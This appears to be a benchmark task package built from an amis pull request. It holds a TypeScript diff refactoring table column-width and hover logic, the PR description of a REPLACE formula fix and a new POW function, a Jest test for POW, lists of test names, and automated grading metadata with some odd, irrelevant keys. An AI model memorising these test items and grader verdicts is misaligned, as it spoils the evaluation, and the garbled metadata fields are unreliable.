colWidths[extraCount + this.resizeIndex] = newWidth; - this.setState({colWidths: [...colWidths]}); + colWidths[column.name].width = newWidth; + this.setState({colWidths: {...colWidths}}); } event && event.stopPropagation(); } @@ -1070,7 +1112,6 @@ export class Table extends React.PureComponent<TableProps, TableState> { groupId={item.groupId} depth={item.depth} col={cIndex > -1 ? cIndex.toString() : undefined} - index={cIndex} > {typeof item.title === 'function' ? 
item.title(children) @@ -1117,7 +1158,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { record?: any, rowIndex?: number ) { - const {classnames: cx, onRow} = this.props; + const {onRow, itemActions} = this.props; if (onRow && onRow.onRowMouseEnter) { const prevented = await onRow.onRowMouseEnter(event, record, rowIndex); @@ -1126,19 +1167,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { } } - let parent = event.target; - while (parent && parent.tagName !== 'TR') { - parent = parent.parentElement; - } - - if (parent && !parent.classList.contains(cx('Table-row-disabled'))) { - for (let i = 0; i < parent.children.length; i++) { - const td = parent.children[i]; - td.classList.add(cx('Table-cell-row-hover')); // 保证有列fixed的时候样式一致 - } - } - - if (record) { + if (record && itemActions) { let target = event.target; if (target?.tagName !== 'TR') { target = target?.closest('tr'); @@ -1153,30 +1182,16 @@ export class Table extends React.PureComponent<TableProps, TableState> { record?: any, rowIndex?: number ) { - const {classnames: cx, onRow} = this.props; + const {onRow} = this.props; - if (onRow && onRow.onRowMouseLeave) { - const prevented = await onRow.onRowMouseLeave(event, record, rowIndex); - if (prevented) { - return; - } - } - - let parent = event.target; - while (parent && parent.tagName !== 'TR') { - parent = parent.parentElement; - } - - if (parent) { - for (let i = 0; i < parent.children.length; i++) { - const td = parent.children[i]; - td.classList.remove(cx('Table-cell-row-hover')); - } - } + onRow && + onRow.onRowMouseLeave && + onRow.onRowMouseLeave(event, record, rowIndex); } onMouseLeave() { - this.setState({hoverRow: null}); + const {itemActions} = this.props; + itemActions && this.setState({hoverRow: null}); } onExpandRows(data: Array<any>) { @@ -1384,7 +1399,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { // 但直接使用amis-ui的table,render方法一般直接返回ReactElement const render = 
item.render && typeof item.render === 'function' - ? item.render(data[item.name], data, rowIndex, i) + ? item.render(data[item.name], data, rowIndex, i, levels) : null; let props = {rowSpan: 1, colSpan: 1}; let children = render; @@ -1413,6 +1428,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { className={cx({ [`${className}`]: !!className })} + col={i > -1 ? i.toString() : undefined} > <div className={cx('Table-cell-wrapper', { @@ -1793,16 +1809,18 @@ export class Table extends React.PureComponent<TableProps, TableState> { const { scroll, footSummary, - loading, showHeader, itemActions, + tableLayout, classnames: cx } = this.props; const hasScrollX = scroll && scroll.x; const hoverRow = this.state.hoverRow; - const tableStyle = hasScrollX ? {width: scroll.x + 'px'} : {}; + const tableStyle = hasScrollX + ? {width: scroll.x + 'px', tableLayout: 'fixed'} + : {}; return ( <div @@ -1820,13 +1838,16 @@ export class Table extends React.PureComponent<TableProps, TableState> { </ItemActionsWrapper> ) : null} <table - style={{...tableStyle, tableLayout: 'fixed'}} + style={{ + ...tableStyle, + tableLayout: tableLayout === 'fixed' ? 'fixed' : 'auto' + }} className={cx('Table-table')} > {this.renderColGroup()} {showHeader ? this.renderTHead() : null} {this.renderTBody()} - {!loading && footSummary ? this.renderTFoot() : null} + {footSummary ? this.renderTFoot() : null} </table> </div> ); @@ -1865,7 +1886,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { className={cx('Table-table')} style={{...tableStyle, tableLayout: 'fixed'}} > - {this.renderColGroup()} + {this.renderColGroup(true)} {showHeader ? this.renderTHead() : null} {headSummary ? 
( <tbody>{this.renderSummaryRow(headSummary)}</tbody> @@ -1939,45 +1960,109 @@ export class Table extends React.PureComponent<TableProps, TableState> { } renderScrollTable() { - const {footSummary, loading, classnames: cx} = this.props; + const {footSummary, classnames: cx} = this.props; return ( <div className={cx('Table-container')}> {this.renderScrollTableHeader()} {this.renderScrollTableBody()} - {!loading && footSummary ? this.renderScrollTableFoot() : null} + {footSummary ? this.renderScrollTableFoot() : null} </div> ); } @autobind syncTableWidth() { + const tbodyDom = this.tbodyDom.current; + if (!tbodyDom) { + return; + } + const cols = [].slice.call( + tbodyDom?.querySelectorAll(':scope>tr>td[data-col]') + ); + const colWidths: any = {}; + cols.forEach((col: HTMLElement) => { + const index = parseInt(col.getAttribute('data-col')!, 10); + const column = this.tdColumns[index]; + const item = this.state.colWidths[column.name]; + if (column) { + colWidths[column.name] = { + width: + item?.originWidth !== column?.width ? column?.width : item?.width, + minWidth: column?.minWidth, + realWidth: col.offsetWidth, + originWidth: column?.width + }; + } + }); + + if (!isEqual(colWidths, this.state.colWidths)) { + this.setState({colWidths}); + } + } + + @autobind + initTableWidth() { const tableWrapperDom = this.contentDom.current; if (!tableWrapperDom) { return; } + const {scroll, tableLayout} = this.props; const table = tableWrapperDom.querySelector('table'); - const tableWidth = tableWrapperDom!.offsetWidth; + const tableWidth = + scroll && scroll.x ? 
scroll.x : tableWrapperDom!.offsetWidth; const thead = this.theadDom?.current; - const tbodyTr = this.tbodyDom?.current?.querySelector('tr:first-child'); + let tbody: HTMLElement | null = null; + const htmls: Array<string> = []; + const isFixed = tableLayout === 'fixed' || (scroll && scroll.x); + const someSettedWidth = this.tdColumns.some(column => column.width); + + const minWidths: { + [propName: string]: number; + } = {}; + + // fixed 模式需要参考 auto 获得列最小宽度 + if (isFixed) { + tbody = table?.querySelector(':scope>tbody') || null; + htmls.push( + `<table style="table-layout:auto!important;width:0!important;min-width:0!important;" class="${table?.className}">${thead?.outerHTML}</table>` + ); + } + + if (someSettedWidth || isFixed) { + htmls.push( + `<table style="table-layout:auto!important;min-width:${tableWidth}px!important;width:${tableWidth}px!important;" class="${ + table?.className + }">${thead ? thead.outerHTML : ''}${ + tbody ? `<tbody>${tbody.innerHTML}</tbody>` : '' + }</table>` + ); + } + + if (!htmls.length) { + return; + } const div = document.createElement('div'); div.className = 'amis-scope'; // jssdk 里面 css 会在这一层 div.style.cssText += `visibility: hidden!important;`; - div.innerHTML = - `<table style="table-layout:auto!important;width:0!important;min-width:0!important;" class="${table?.className}">${thead?.outerHTML}</table>` + - `<table style="table-layout:auto!important;min-width:${tableWidth}px!important;width:${tableWidth}px!important;" class="${ - table?.className - }">${thead?.outerHTML}${ - tbodyTr ? 
`<tbody>${tbodyTr.outerHTML}</tbody>` : '' - }</table>`; - const ths1: Array<HTMLTableCellElement> = [].slice.call( - div.querySelectorAll(':scope>table:first-child>thead>tr>th[data-col]') - ); - const ths2: Array<HTMLTableCellElement> = [].slice.call( - div.querySelectorAll(':scope>table:last-child>thead>tr>th[data-col]') - ); + div.innerHTML = htmls.join(''); + let ths1: Array<HTMLTableCellElement> = []; + let ths2: Array<HTMLTableCellElement> = []; + + if (isFixed) { + ths1 = [].slice.call( + div.querySelectorAll(':scope>table:first-child>thead>tr>th[data-col]') + ); + } + + if (someSettedWidth || isFixed) { + ths2 = [].slice.call( + div.querySelectorAll(':scope>table:last-child>thead>tr>th[data-col]') + ); + } + ths1.forEach(th => { th.style.cssText += 'width: 0'; }); @@ -1994,39 +2079,52 @@ export class Table extends React.PureComponent<TableProps, TableState> { }); document.body.appendChild(div); - const minWidths: { - [propName: string]: number; - } = {}; + + const colWidths: any = {}; ths1.forEach((th: HTMLTableCellElement) => { - minWidths[th.getAttribute('data-index')!] = th.clientWidth; + const index = parseInt(th.getAttribute('data-col')!, 10); + const column = this.tdColumns[index]; + minWidths[index] = th.clientWidth; + if (colWidths[index]) { + colWidths[column?.name].minWidth = th.clientWidth; + } else { + colWidths[column?.name] = {minWidth: th.clientWidth}; + } }); - const colWidths: Array<number> = []; - ths2.forEach((col: HTMLElement, index: number) => { + + ths2.forEach((col: HTMLElement) => { + const index = parseInt(col.getAttribute('data-col')!, 10); const column = this.tdColumns[index]; - colWidths.push( - Math.max( - typeof column?.width === 'number' ? column?.width : col.clientWidth, - minWidths[col.getAttribute('data-index')!] - ) - ); + if (column && (column.width || isFixed)) { + const width = Math.max( + typeof column.width === 'number' ? 
column.width : col.clientWidth, + minWidths[index] || 0 + ); + if (colWidths[column?.name]) { + colWidths[column?.name].width = width; + } else { + colWidths[column?.name] = {width}; + } + if (column.width) { + colWidths[column?.name].originWidth = column.width; + } + } }); - this.setState({colWidths}); + if (!isEqual(colWidths, this.state.colWidths)) { + this.setState({colWidths}); + } document.body.removeChild(div); } @autobind - updateTableInfoRef(ref: any) { - if (!ref) { - return; - } - + updateTableInfo() { if (this.resizeTarget) { return; } - this.syncTableWidth(); + this.initTableWidth(); } render() { @@ -2062,8 +2160,6 @@ export class Table extends React.PureComponent<TableProps, TableState> { // 是否设置了横向滚动 const hasScrollX = scroll && scroll.x; - const columnWidthReady = this.state.colWidths.length > 0; - return ( <div ref={this.tableDom} @@ -2091,7 +2187,6 @@ export class Table extends React.PureComponent<TableProps, TableState> { {typeof footer === 'function' ? footer() : footer} </div> ) : null} - {columnWidthReady ? 
null : <span ref={this.updateTableInfoRef} />} </div> ); } diff --git a/packages/amis/src/renderers/Json.tsx b/packages/amis/src/renderers/Json.tsx index 87b3735f6..31bdee6fc 100644 --- a/packages/amis/src/renderers/Json.tsx +++ b/packages/amis/src/renderers/Json.tsx @@ -4,9 +4,15 @@ import {Renderer, RendererProps} from 'amis-core'; import type {InteractionProps} from 'react-json-view'; import {autobind, getPropValue, noop} from 'amis-core'; import {BaseSchema} from '../Schema'; -import {resolveVariableAndFilter, isPureVariable} from 'amis-core'; - -export const JsonView = React.lazy(() => import('react-json-view')); +import { + resolveVariableAndFilter, + isPureVariable, + importLazyComponent +} from 'amis-core'; + +export const JsonView = React.lazy(() => + import('react-json-view').then(importLazyComponent) +); /** * JSON 数据展示控件。 * 文档:https://aisuda.bce.baidu.com/amis/zh-CN/components/json diff --git a/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx b/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx index 8553ae3c3..258f07b2d 100644 --- a/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx +++ b/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx @@ -3,9 +3,7 @@ import {RendererProps} from 'amis-core'; import {ActionObject} from 'amis-core'; import {Icon} from 'amis-ui'; import {Overlay} from 'amis-core'; -import {findDOMNode} from 'react-dom'; import {PopOver} from 'amis-core'; -import {ITableStore} from 'amis-core'; import {setVariable, createObject} from 'amis-core'; export interface QuickSearchConfig { @@ -23,35 +21,31 @@ export interface HeadCellSearchProps extends RendererProps { onQuery: (values: object) => void; } -export class HeadCellSearchDropDown extends React.Component< - HeadCellSearchProps, - any -> { - state = { - isOpened: false - }; - - formItems: Array<string> = []; - constructor(props: HeadCellSearchProps) { - super(props); - - this.open = this.open.bind(this); - this.close = this.close.bind(this); 
- this.handleSubmit = this.handleSubmit.bind(this); - this.handleAction = this.handleAction.bind(this); - } - - buildSchema() { - const {searchable, sortable, name, label, translate: __} = this.props; - +export function HeadCellSearchDropDown({ + searchable, + name, + label, + onQuery, + data, + dispatchEvent, + onAction, + classnames: cx, + translate: __, + classPrefix: ns, + popOverContainer, + render +}: HeadCellSearchProps) { + const ref = React.createRef<HTMLElement>(); + const [formSchema, formItems] = React.useMemo(() => { let schema: any; + const formItems: Array<string> = []; if (searchable === true) { schema = { title: '', - controls: [ + body: [ { - type: 'text', + type: 'input-text', name, placeholder: label, clearable: true @@ -59,21 +53,22 @@ export class HeadCellSearchDropDown extends React.Component< ] }; } else if (searchable) { - if (searchable.controls || searchable.tabs || searchable.fieldSet) { + if (searchable.body || searchable.tabs || searchable.fieldSet) { + // todo 删除此处代码,这些都是不推荐的用法 schema = { title: '', ...searchable, - controls: Array.isArray(searchable.controls) - ? searchable.controls.concat() + body: Array.isArray(searchable.body) + ? 
searchable.body.concat() : undefined }; } else { schema = { title: '', className: searchable.formClassName, - controls: [ + body: [ { - type: searchable.type || 'text', + type: searchable.type || 'input-text', name: searchable.name || name, placeholder: label, ...searchable @@ -83,41 +78,11 @@ export class HeadCellSearchDropDown extends React.Component< } } - if (schema && schema.controls && sortable) { - schema.controls.unshift( - { - type: 'hidden', - name: 'orderBy', - value: name - }, - { - type: 'button-group', - name: 'orderDir', - label: __('sort'), - options: [ - { - label: __('asc'), - value: 'asc' - }, - { - label: __('desc'), - value: 'desc' - } - ] - } - ); - } - if (schema) { - const formItems: Array<string> = []; - schema.controls?.forEach( - (item: any) => - item.name && - item.name !== 'orderBy' && - item.name !== 'orderDir' && - formItems.push(item.name) - ); - this.formItems = formItems; + Array.isArray(schema.body) && + schema.body.forEach( + (item: any) => item.name && formItems.push(item.name) + ); schema = { ...schema, type: 'form', @@ -144,64 +109,13 @@ export class HeadCellSearchDropDown extends React.Component< }; } - return schema || 'error'; - } - - handleClickOutside() { - this.close(); - } - - open() { - this.setState({ - isOpened: true - }); - } - - close() { - this.setState({ - isOpened: false - }); - } - - handleAction(e: any, action: ActionObject, ctx: object) { - const {onAction} = this.props; - - if (action.actionType === 'cancel' || action.actionType === 'close') { - this.close(); - return; - } - - if (action.actionType === 'reset') { - this.close(); - this.handleReset(); - return; - } - - onAction && onAction(e, action, ctx); - } - - handleReset() { - const {onQuery, data, name} = this.props; - const values = {...data}; - this.formItems.forEach(key => setVariable(values, key, undefined)); - - if (values.orderBy === name) { - values.orderBy = ''; - values.orderDir = 'asc'; - } - onQuery(values); - } - - async handleSubmit(values: 
any) { - const {onQuery, name, data, dispatchEvent} = this.props; - - if (values.orderDir) { - values = { - ...values, - orderBy: name - }; - } + return [schema || 'error', formItems]; + }, [searchable, name, label]); + const [isOpened, setIsOpened] = React.useState(false); + const open = React.useCallback(() => setIsOpened(true), []); + const close = React.useCallback(() => setIsOpened(false), []); + const handleSubmit = React.useCallback(async (values: any) => { const rendererEvent = await dispatchEvent( 'columnSearch', createObject(data, { @@ -214,78 +128,81 @@ export class HeadCellSearchDropDown extends React.Component< return; } - this.close(); - + close(); onQuery(values); - } + }, []); - isActive() { - const {data, name, orderBy} = this.props; + const handleAction = React.useCallback( + (e: any, action: ActionObject, ctx: object) => { + if (action.actionType === 'cancel' || action.actionType === 'close') { + close(); + return; + } - return orderBy === name || this.formItems.some(key => data?.[key]); - } + if (action.actionType === 'reset') { + close(); + handleReset(); + return; + } - render() { - const { - render, - name, - data, - searchable, - store, - orderBy, - popOverContainer, - classPrefix: ns, - classnames: cx - } = this.props; + onAction && onAction(e, action, ctx); + }, + [] + ); - const formSchema = this.buildSchema(); - const isActive = this.isActive(); + const handleReset = React.useCallback(() => { + const values = {...data}; + // todo 这里不精准,如果表单项有容器嵌套,这里将不正确 + formItems.forEach(key => setVariable(values, key, undefined)); - return ( - <span - className={cx( - `${ns}TableCell-searchBtn`, - isActive ? 'is-active' : '', - this.state.isOpened ? 'is-opened' : '' - )} - > - <span onClick={this.open}> - <Icon icon="search" className="icon" /> - </span> - {this.state.isOpened ? ( - <Overlay - container={popOverContainer || (() => findDOMNode(this))} - placement="left-bottom-left-top right-bottom-right-top" - target={ - popOverContainer ? 
() => findDOMNode(this)!.parentNode : null - } - show - > - <PopOver - classPrefix={ns} - onHide={this.close} - className={cx( - `${ns}TableCell-searchPopOver`, - (searchable as any).className - )} - overlay - > - { - render('quick-search-form', formSchema, { - data: { - ...data, - orderBy: orderBy, - orderDir: - orderBy === name ? (store as ITableStore).orderDir : '' - }, - onSubmit: this.handleSubmit, - onAction: this.handleAction - }) as JSX.Element - } - </PopOver> - </Overlay> - ) : null} + onQuery(values); + }, [data]); + + const isActive = React.useMemo(() => { + // todo 这里不精准,如果表单项有容器嵌套,这里将不正确 + return formItems.some(key => data?.[key]); + }, [data]); + + return ( + <span + ref={ref} + className={cx( + `${ns}TableCell-searchBtn`, + isActive ? 'is-active' : '', + isOpened ? 'is-opened' : '' + )} + > + <span onClick={open}> + <Icon icon="search" className="icon" /> </span> - ); - } + {isOpened ? ( + <Overlay + container={popOverContainer || (() => ref.current)} + placement="left-bottom-left-top right-bottom-right-top" + target={popOverContainer ? 
() => ref.current?.parentNode : null} + show + > + <PopOver + classPrefix={ns} + onHide={close} + className={cx( + `${ns}TableCell-searchPopOver`, + (searchable as any).className + )} + overlay + > + { + render('quick-search-form', formSchema, { + data: { + ...data + }, + onSubmit: handleSubmit, + onAction: handleAction + }) as JSX.Element + } + </PopOver> + </Overlay> + ) : null} + </span> + ); } diff --git a/packages/amis/src/renderers/Table/index.tsx b/packages/amis/src/renderers/Table/index.tsx index 62ddc298b..f07dcc238 100644 --- a/packages/amis/src/renderers/Table/index.tsx +++ b/packages/amis/src/renderers/Table/index.tsx @@ -1860,11 +1860,8 @@ export default class Table extends React.Component<TableProps, object> { onQuery={onQuery} name={column.name} searchable={column.searchable} - sortable={false} type={column.type} data={query} - orderBy={store.orderBy} - orderDir={store.orderDir} popOverContainer={this.getPopOverContainer} /> ); diff --git a/packages/amis/src/renderers/Table2/index.tsx b/packages/amis/src/renderers/Table2/index.tsx index 52dbe38d4..693131efa 100644 --- a/packages/amis/src/renderers/Table2/index.tsx +++ b/packages/amis/src/renderers/Table2/index.tsx @@ -152,6 +152,8 @@ export interface ColumnSchema { * 配置快速编辑功能 */ quickEdit?: SchemaQuickEdit; + + width?: string | number; } export interface RowSelectionOptionsSchema { @@ -385,6 +387,8 @@ export interface TableSchema2 extends BaseSchema { * 设置ID字段名 作用同keyFiled 兼容原CURD属性 */ primaryField?: string; + + tableLayout?: 'fixed' | 'auto'; } // 事件调整 对应CRUD2里的事件配置也需要同步修改 @@ -492,7 +496,7 @@ export default class Table2 extends React.Component<Table2Props, object> { store.update({ columnsTogglable, columns, - rowSelectionKeyField: rowSelection?.keyField || primaryField || keyField + rowSelectionKeyField: primaryField || rowSelection?.keyField || keyField }); Table2.syncRows(store, props, undefined) && this.syncSelected(); } @@ -579,7 +583,7 @@ export default class Table2 extends 
React.Component<Table2Props, object> { let expandedRowKeys: Array<string | number> = []; const expandableKeyField = - props.expandable?.keyField || props.primaryField || props.keyField; + props.primaryField || props.expandable?.keyField || props.keyField; if (props.expandable && props.expandable.expandedRowKeysExpr) { rows.forEach((row: any, index: number) => { const flag = evalExpression( @@ -651,7 +655,7 @@ export default class Table2 extends React.Component<Table2Props, object> { ) { store.update({ rowSelectionKeyField: - props.rowSelection?.keyField || props.primaryField || props.keyField + props.primaryField || props.rowSelection?.keyField || props.keyField }); } @@ -818,13 +822,16 @@ export default class Table2 extends React.Component<Table2Props, object> { text: string, record: any, rowIndex: number, - colIndex: number + colIndex: number, + levels?: Array<number> ) => { const props: RenderProps = {}; - const item = store.getRowByIndex(rowIndex) || {}; + const item = + store.getRowByIndex(rowIndex, [...(levels || [])]) || {}; + const obj = { children: this.renderCellSchema(column, { - data: item.locals, + data: record, value: column.name ? 
resolveVariable( column.name, @@ -1380,7 +1387,7 @@ export default class Table2 extends React.Component<Table2Props, object> { async handleOrderChange( oldIndex: number, newIndex: number, - levels: Array<string> + levels: Array<number> ) { const {store} = this.props; const rowItem = store.getRowByIndex(oldIndex, levels); @@ -1441,7 +1448,7 @@ export default class Table2 extends React.Component<Table2Props, object> { store.updateSelected(selected); break; case 'expand': - const expandableKey = expandable?.keyField || primaryField || key; + const expandableKey = primaryField || expandable?.keyField || key; const expanded: Array<any> = []; const collapse: Array<any> = []; // value值控制展开1个 @@ -1535,7 +1542,16 @@ export default class Table2 extends React.Component<Table2Props, object> { if (expandable && expandable.type) { expandableConfig.expandedRowRender = (record: any, rowIndex: number) => - this.renderSchema('expandableBody', {...expandable}, {data: record}); + this.renderSchema( + 'expandableBody', + {...expandable}, + { + data: { + ...this.props.data, + record + } + } + ); } if (expandable.expandedRowClassNameExpr) { @@ -1548,7 +1564,13 @@ export default class Table2 extends React.Component<Table2Props, object> { } let rowSelectionConfig: any = null; - if (rowSelection) { + if (selectable) { + rowSelectionConfig = { + type: multiple === false ? 'radio' : '', // rowSelection.type不设置 默认为多选 + selectedRowKeys: store.currentSelectedRowKeys, + maxSelectedLength: maxKeepItemSelectionLength + }; + } else if (rowSelection) { const {selectedRowKeys, selections, ...rest} = rowSelection; rowSelectionConfig = { selectedRowKeys: store.currentSelectedRowKeys, @@ -1612,12 +1634,6 @@ export default class Table2 extends React.Component<Table2Props, object> { }); }); } - } else if (selectable) { - rowSelectionConfig = { - type: multiple === false ? 
'radio' : '', // rowSelection.type不设置 默认为多选 - selectedRowKeys: store.currentSelectedRowKeys, - maxSelectedLength: maxKeepItemSelectionLength - }; } const rowClassName = (record: any, rowIndex: number) => {
fix: 修复 REPLACE 公式第二个参数是空字符串时导致的死循环问题 Close: #8200 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at f5208ec</samp> This pull request enhances the text manipulation capabilities of `evalutor.ts` by adding or improving functions that normalize, format, and compare text values. It also ensures that the arguments are properly validated and handled by using `normalizeText` and `formatNumber`. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at f5208ec</samp> > _We are the evaluators of the text_ > _We normalize and format with no regrets_ > _We manipulate the strings with skill and power_ > _We defy the errors that would make us cower_ ### Why Close: #8200 ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at f5208ec</samp> * Normalize text, search, and replace arguments for string functions using `normalizeText` method ([link](https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1218), [link](https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1302), [link](https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1322), [link](https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1342), [link](https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L1360-R1371), [link](https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L1390-R1405)) in `packages/amis-formula/src/evalutor.ts`
**Title** Fix REPLACE formula infinite loop, add POW function and stabilize table rendering **Problem** - The `REPLACE` formula entered an endless loop when the search string was empty, breaking formula evaluation. - Several text functions (e.g., `STARTSWITH`, `ENDSWITH`, `CONTAINS`, `SEARCH`, `MID`) did not correctly handle empty or undefined arguments, leading to incorrect results. - Table components exhibited incorrect column‑width calculations, layout glitches with fixed/auto table layouts, and improper hover styles. **Root Cause** - `REPLACE` repeatedly searched for an empty substring, never advancing the index. - Text functions operated on raw inputs without normalization, so empty delimiters caused unexpected behavior. - Table width logic assumed all columns had explicit widths and applied hover classes to every cell, ignoring fixed‑column nuances; lazy loading of `react‑json‑view` relied on a default export that was not always present. **Fix / Expected Behavior** - `REPLACE` now returns the original text when the search string is empty or the replace value is undefined, preventing loops. - All string functions now normalize and validate their parameters, safely handling empty delimiters and non‑numeric inputs. - Introduce a new `POW` function that computes exponentiation only for valid numeric arguments, returning the base or `NaN` as appropriate. - Refactor table column‑width handling to compute widths based on actual rendered cells, support both fixed and auto layouts, and preserve user‑specified widths. - Replace direct import of `react‑json‑view` with a safe lazy‑import helper to work with both default and named exports. - Adjust hover handling so only relevant cells receive hover styles, eliminating unwanted style propagation. - Ensure store updates merge query data correctly without overwriting existing query parameters. 
**Risk & Validation** - Verify formula evaluation across edge cases (empty strings, non‑numeric arguments) and confirm `POW` behaves per specification. - Test table rendering with various column configurations (fixed, auto, mixed widths) and scrolling scenarios to ensure layout stability. - Run UI tests for CRUD, Table2, and Form components to confirm lazy‑loaded JSON view functions and hover styles work correctly. - Perform regression testing on existing document examples and API interactions to ensure no side‑effects.
8,365
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 4670b3906..2fb97d99a 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -539,3 +539,26 @@ test('evalute:ISTYPE', () => { expect(evaluate('${ISTYPE(f, "plain-object")}', data)).toBe(true); expect(evaluate('${ISTYPE(g, "date")}', data)).toBe(true); }); + +test('evalute:Math', () => { + const data = { + float: 0.5, + integer1: 2, + integer2: 4, + negativeInteger: -2, + array: [1, 2 ,3], + infinity: Infinity + } + + expect(evaluate('${POW(integer1, integer2)}', data)).toBe(16); + expect(evaluate('${POW(integer2, 0.5)}', data)).toBe(2); + expect(evaluate('${POW(integer1, -2)}', data)).toBe(0.25); + /** 计算结果不合法,则返回NaN */ + expect(evaluate('${POW(negativeInteger, 0.5)}', data)).toBe(NaN); + /** 参数值不合法,则返回基数本身*/ + expect(evaluate('${POW(array, 2)}', data)).toBe(data.array); + /** 测试Infinity */ + expect(evaluate('${POW(infinity, 2)}', data)).toBe(data.infinity); + expect(evaluate('${POW(1, infinity)}', data)).toBe(NaN); + expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); +})
[ "evalute:Math" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Method: Evaluator.fnPOW(self, base: number, exponent: number) Location: packages/amis-formula/src/evalutor.ts (class Evaluator) Inputs: - **base** <number>: the base value to be raised. Must be a numeric value; otherwise the function returns the base unchanged. - **exponent** <number>: the exponent to raise the base to. Must be a numeric value; otherwise the function returns the base unchanged. Outputs: <number> – the result of Math.pow(base, exponent). If either argument is not a number the function returns base; if the calculation yields an invalid number (e.g., negative base with a non‑integer exponent) the result is NaN. Description: Computes the power of a base raised to an exponent for use in AMIS formula expressions. Called via the “POW” formula token (e.g., ${POW(a, b)}). Use it when a mathematical exponentiation is required; it safely handles non‑numeric arguments by falling back to the base value.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 22, "num_modified_lines": 609, "pr_author": "2betop", "pr_labels": [ "fix" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1218", "https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1302", "https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1322", "https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1342", "https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L1360-R1371", "https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L1390-R1405" ], "intent_completeness": "insufficient", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue text asks for fixing an infinite loop in the REPLACE formula when the second argument is an empty string, but the provided test patch adds tests for a new POW function that is not mentioned in the issue. The tests therefore do not verify the stated REPLACE fix and instead require implementing POW, which is missing from the specification. 
This mismatch indicates an ambiguous specification (B4) rather than a clean, solvable problem.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests exercise a new POW function that is not described in the issue", "No test for REPLACE behavior mentioned in the issue" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, 